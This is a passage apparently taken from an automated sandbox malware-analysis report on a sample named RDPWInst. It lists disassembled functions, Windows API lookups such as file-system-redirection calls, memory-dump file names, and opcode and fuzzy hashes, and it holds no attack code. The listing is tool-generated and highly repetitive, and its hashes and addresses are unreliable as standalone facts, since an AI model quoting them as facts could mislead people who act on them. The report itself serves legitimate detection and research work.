                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleMetricsSystemThread
                                                                                                              • String ID: p[D
                                                                                                              • API String ID: 3035471613-2202972244
                                                                                                              • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                              • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                                                                              • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                                              • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                                                                              Function 0043A688 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 1646373207-3689287502
                                                                                                              • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                              • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                                                                              • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                                              • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                                                                              Function 0043A724 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 1646373207-1355242751
                                                                                                              • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                              • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                                                                              • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                              • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                                                                              Function 00415B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                              • API String ID: 1646373207-1127948838
                                                                                                              • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                              • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                                                                              • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                              • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D